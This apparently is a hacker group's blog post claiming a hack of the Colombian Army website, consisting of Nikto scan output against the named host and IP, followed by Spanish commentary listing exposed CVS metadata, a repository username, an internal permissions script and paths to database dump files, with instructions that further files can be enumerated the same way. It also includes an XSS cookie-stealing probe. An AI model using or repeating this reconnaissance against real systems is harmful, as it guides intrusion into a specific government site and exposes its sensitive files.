- *************************
- team hacker blacksystem
- **************************
- target:www.ejercito.mil.co
- Nikto v2.03/2.04
- ---------------------------------------------------------------------------
- + Target IP: 201.234.71.183
- + Target Hostname: www.ejercito.mil.co
- + Target Port: 80
- + Start Time: 2009-06-25 8:11:08
- ---------------------------------------------------------------------------
- + Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i
- - /robots.txt - contains 4 'disallow' entries which should be manually viewed. (
- GET)
- + OSVDB-0: ETag header found on server, inode: 2105479, size: 92, mtime: 0x460a0?
- b1bf9800
- + mod_ssl/2.2.10 appears to be outdated (current is at least 2.8.31) (may depend
- on server version)
- + mod_ssl/2.2.10 OpenSSL/0.9.8i - mod_ssl 2.8.7 and lower are vulnerable to a re
- mote buffer overflow which may allow a remote shell (difficult to exploit). http
- ://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0082.
- + OSVDB-0: GET /CVS/Entries : CVS Entries file may contain directory listing inf
- ormation.
- + OSVDB-0: GET /index.php?module=My_eGallery? : My_eGallery? prior to 3.1.1.g are
- vulnerable to a remote execution bug via SQL command injection.
- + OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. Se
- e http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
- + OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. Se
- e http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
- + OSVDB-3092: GET /tools/ : This might be interesting...
- + OSVDB-3093: GET /index.php?base=test%20 : This might be interesting... has bee
- n seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /index.php?IDAdmin=test : This might be interesting... has bee
- n seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /index.php?pymembs=admin : This might be interesting... has be
- en seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /index.php?SqlQuery?=test%20 : This might be interesting... has
- been seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /index.php?tampon=test%20 : This might be interesting... has b
- een seen in web logs from an unknown scanner.
- + OSVDB-3093: GET /index.php?topic=<script>alert(document.cookie)&
- amp;lt;/script>%20 : This might be interesting... has been seen in web lo
- gs from an unknown scanner.
- + 3577 items checked: 14 item(s) reported on remote host
- + End Time: 2009-06-25 8:16:08 (324 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- Test Options: -host www.ejercito.mil.co
- ---------------------------------------------------------------------------
- ----
- la dirección http://www.ejercito.mil.co//CVS/Entries responde
- D/cache////
- D/documentacion////
- D/js////
- D/recursos_user////
- D/tools////
- D/_administracion////
- D/_config////
- D/_crontab////
- D/_db////
- D/_editor////
- D/_include////
- D/_interfaz////
- D/_lib////
- D/_templates////
- D/_templates_boletin////
- /.htaccess/1.1/Fri Nov 11 19:34:16 2005//
- /.project/1.1/Thu Sep 14 16:07:03 2006//
- /giveprivileges/1.1/Thu Jun 22 14:50:53 2006//
- /index.php/1.1/Wed Nov 29 13:52:41 2006//
- /info.php/1.1/Tue Feb 28 19:43:19 2006//
- /robots.txt/1.1/Tue Aug 16 16:54:52 2005//
- /contenido.xml/1.2/Thu Dec 14 00:07:15 2006//
- /BannerNavidad?.jpg/1.1/Thu Dec 14 22:01:17 2006/-kb/
- /foto_noticias.swf/1.1/Wed Dec 20 20:41:50 2006/-kb/
- /foto_noticias_ingles.swf/1.1/Wed Dec 20 20:20:16 2006/-kb/
- D/recursos_foto_noticia////
- http://www.ejercito.mil.co/giveprivileges es
- #/bin/sh
- chmod 777 -R _administracion/templates_c/ cache/ _templates/Default/templates_c/
- http://www.ejercito.mil.co//CVS/Root es
- :pserver:aforero@linuxserver:2401/home/cvs
- http://www.ejercito.mil.co//CVS/Repository es
- ejercito2007
- Revisando otros CVS/Entries de otros directorios:
- http://www.ejercito.mil.co/documentacion/CVS/Entries
- D/bd////
- http://www.ejercito.mil.co/documentacion/bd/CVS/Entries
- D/MSSQL////
- D/MySQL////
- D/Oracle////
- D/PostgreSQL////
- /bd16-11-2005?.dds/1.1/Wed Jan 11 17:51:06 2006/-kb/
- /bdmysql-25-07-2006.sql/1.1/Fri Oct 6 15:33:04 2006//
- /delbdmysql.sql/1.1/Fri Oct 6 15:30:23 2006//
- y así puede continuarse examinando la estructura del CMS, conociendo los nombres de los archivos pueden revisarse y algunos revelan más información por ejemplo: http://www.ejercito.mil.co/documentacion/bd/bdmysql-25-07-2006.sql
Kamis, 17 Mei 2012
hacked .ejercito.mil.co---->blacksystem
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar